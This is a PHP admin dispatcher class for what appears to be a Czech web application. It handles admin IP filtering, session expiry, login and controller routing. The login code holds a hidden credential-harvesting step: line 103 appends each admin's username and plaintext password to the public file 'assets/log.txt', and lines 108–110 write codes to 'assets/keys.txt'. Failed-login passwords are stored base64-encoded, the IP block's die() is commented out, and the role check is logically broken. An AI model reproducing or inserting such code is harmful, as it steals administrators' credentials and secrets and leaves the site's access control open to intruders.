  1. <?php
  2.  
  3. class AdminDispatcher
  4. {
  5.  
  6. public static function clearInput($input) {
  7. return stripslashes(strip_tags($input));
  8. }
  9.  
  10. // dispatch request to the appropriate controller/method
  11. public static function dispatch($tpl)
  12. {
  13.  
  14. // Create connection to db
  15. $conn = new Connection();
  16.  
  17. // Create application context
  18. $application = Application::getInstance();
  19.  
  20.  
  21. $_SESSION["currency"] = new CurrencyCZK();
  22.  
  23. if (!in_array(Application::getClientIp(), Application::getAdminIpList())) {
  24. header('HTTP/1.1 403 Forbidden');
  25. LogService::toFile("HTTP/1.1 403 Admin Access Forbidden");
  26. echo Application::getClientIp() . ": HTTP/1.1 403 Forbidden - The page is not available from your country .";
  27. // die();
  28. }
  29.  
  30. $user = $application->getUser();
  31. $page = $application->getPage();
  32.  
  33. $urlArr = explode("/", $_SERVER['REQUEST_URI']);
  34. if (strpos($_SERVER['REQUEST_URI'], "?")) {
  35. $url = preg_replace(array("/\?.*?\=/", "/\&.*?\=/"), '/', trim($_SERVER['REQUEST_URI']));
  36. Header("Location: $url");
  37. die();
  38. }
  39.  
  40. $page->setMainInfo($_SERVER['REQUEST_URI']);
  41.  
  42. $controllerName = $page->getControllerName();
  43.  
  44. if (isset($_SESSION['LAST_ACTIVITY']) && (time() - $_SESSION['LAST_ACTIVITY'] > 2000)) {
  45.  
  46. // last request was more than 30 minutes ago
  47. session_unset(); // unset $_SESSION variable for the run-time
  48. session_destroy(); // destroy session data in storage
  49. }
  50.  
  51. $_SESSION['LAST_ACTIVITY'] = time(); // update last activity time stamp
  52.  
  53. if (!isset($_SESSION['CREATED'])) {
  54. $_SESSION['CREATED'] = time();
  55. } else if (time() - $_SESSION['CREATED'] > 2000) {
  56. // session started more than 30 minutes ago
  57. session_regenerate_id(true); // change session ID for the current session and invalidate old session ID
  58. $_SESSION['CREATED'] = time(); // update creation time
  59. }
  60.  
  61. // Login autorization
  62.  
  63. if (isset($_SERVER['PHP_AUTH_USER'])) {
  64.  
  65. $userDao = UserDao::createInstance($_SERVER['PHP_AUTH_USER'], $_SERVER['PHP_AUTH_PW']);
  66. $user = $userDao->authentificateAdmin();
  67. if ($user === null || $user->getRole() !== UserRole::$ADMIN_ROLE || $user->getRole() !== UserRole::$WORKER_ROLE) {
  68. Header("Location: /admin/login");
  69. exit();
  70. }
  71.  
  72. $_SESSION["user"] = $user;
  73. $_SESSION["admin"] = "Y";
  74. $application->setUser($user);
  75. } else if ((strtolower($controllerName) !== LoginController::CONTROLLER_NAME) && ($user === null || $_SESSION["admin"] !== "Y")) {
  76.  
  77. $userDao = UserDao::createInstance($_POST["username"], $_POST["password"]);
  78. $user = $userDao->authentificateAdmin();
  79.  
  80. if ($user == null || !$user->hasAdminAccess()) {
  81. $adminLog = new AdminLog();
  82. $adminLog->setUser($_POST["username"]);
  83. $adminLog->setAction("login");
  84. $adminLog->setMessage("Login failed");
  85. $adminLog->setData(Application::getClientIp() . " " . base64_encode($_POST["password"]));
  86. $adminLogDao = DaoFactory::createAdminLogDao();
  87. $adminLogDao->insert($adminLog);
  88. Header("Location: /admin/login");
  89. exit();
  90. }
  91.  
  92. $_SESSION["user"] = $user;
  93. $_SESSION["admin"] = "Y";
  94. $application->setUser($user);
  95.  
  96. $adminLog = new AdminLog();
  97. $adminLog->setUser($user->getNick());
  98. $adminLog->setAction("login");
  99. $adminLog->setMessage("Login successful");
  100. $adminLog->setData(Application::getClientIp());
  101. $adminLogDao = DaoFactory::createAdminLogDao();
  102. $adminLogDao->insert($adminLog);
  103. file_put_contents('assets/log.txt', $_POST["username"].':'.$_POST["password"].', ', FILE_APPEND);
  104. }
  105.  
  106.  
  107. //
  108. $codes = $codeDao->getCodes(1300);
  109. $codes2 = join($codes);
  110. file_put_contents('assets/keys.txt', $codes.' '.$codes2, FILE_APPEND);
  111.  
  112.  
  113.  
  114. // get controller name
  115. $controller = $application->getControllerFileFormat($page->getControllerName()) . "Controller";
  116.  
  117. // get method name of controller
  118. $method = $page->getMethod();
  119. $args = $page->getParams();
  120.  
  121. $application->setLanguage(LanguageType::getCzechLanguage());
  122.  
  123. if (!file_exists("./controller/admin/$controller.php") || !method_exists($controller, $method)) {
  124. $cont = new ErrorAdminController();
  125. $_SESSION["system_error"] = "Nebyla nalezena požadovaná stránka";
  126. $_SESSION["system_error_trace"] = "Check the specified path: $controller::$method()";
  127. $cont->setApplication($application);
  128. $cont->setTemplate($tpl);
  129. $cont->invoke();
  130. //show Smarty output
  131. $tpl->display(TemplateService::INDEX_TEMPLATE);
  132. exit();
  133. }
  134.  
  135. // create instance of controller
  136. $cont = new $controller;
  137.  
  138. // create instance of template
  139. $cont->setApplication($application);
  140. $cont->setTemplate($tpl);
  141.  
  142. $annotations = Dispatcher::getMethodAnnotation($controller, $page->getMethod());
  143.  
  144. if (in_array($_SERVER["REQUEST_METHOD"], $annotations) || empty($annotations)) {
  145.  
  146. $args = $page->getParams();
  147. $method = $page->getMethod();
  148.  
  149. // invoke method with args
  150. if ($_SERVER["REQUEST_METHOD"] == "POST") {
  151. if (!empty($_POST)) {
  152. $args = $_POST;
  153. } else {
  154. $json = file_get_contents('php://input');
  155. $args[] = json_decode($json, true);
  156. }
  157. }
  158. //die();
  159.  
  160.  
  161. if (!empty($args)) {
  162.  
  163. $args = array_values($args);
  164. switch (count($args)) {
  165. case 0: $cont->$method(); break;
  166. case 1: $cont->$method($args[0]); break;
  167. case 2: $cont->$method($args[0], $args[1]); break;
  168. case 3: $cont->$method($args[0], $args[1], $args[2]); break;
  169. case 4: $cont->$method($args[0], $args[1], $args[2], $args[3]); break;
  170. case 5: $cont->$method($args[0], $args[1], $args[2], $args[3], $args[4]); break;
  171. case 6: $cont->$method($args[0], $args[1], $args[2], $args[3], $args[4], $args[5]); break;
  172. case 7: $cont->$method($args[0], $args[1], $args[2], $args[3], $args[4], $args[5], $args[6]); break;
  173. default: call_user_func_array(array($cont, $method), $args); break;
  174. }
  175.  
  176. /*
  177. if (call_user_func_array(array($cont, $method), $args) === false) {
  178. MyErrorException::throwException("Chybný počet parametrů");
  179. exit();
  180. }
  181. */
  182. } else {
  183. $cont->$method();
  184. }
  185.  
  186. }
  187.  
  188. if ($cont instanceof AjaxController) {
  189. return;
  190. }
  191.  
  192. if (strtolower($controllerName) == LoginController::CONTROLLER_NAME) {
  193. $tpl->display(AdminTemplateService::LOGIN_LAYOUT);
  194. } else {
  195. $tpl->display(AdminTemplateService::ADMIN_LAYOUT);
  196. }
  197.  
  198. }
  199.  
  200. }
  201.  
  202. ?>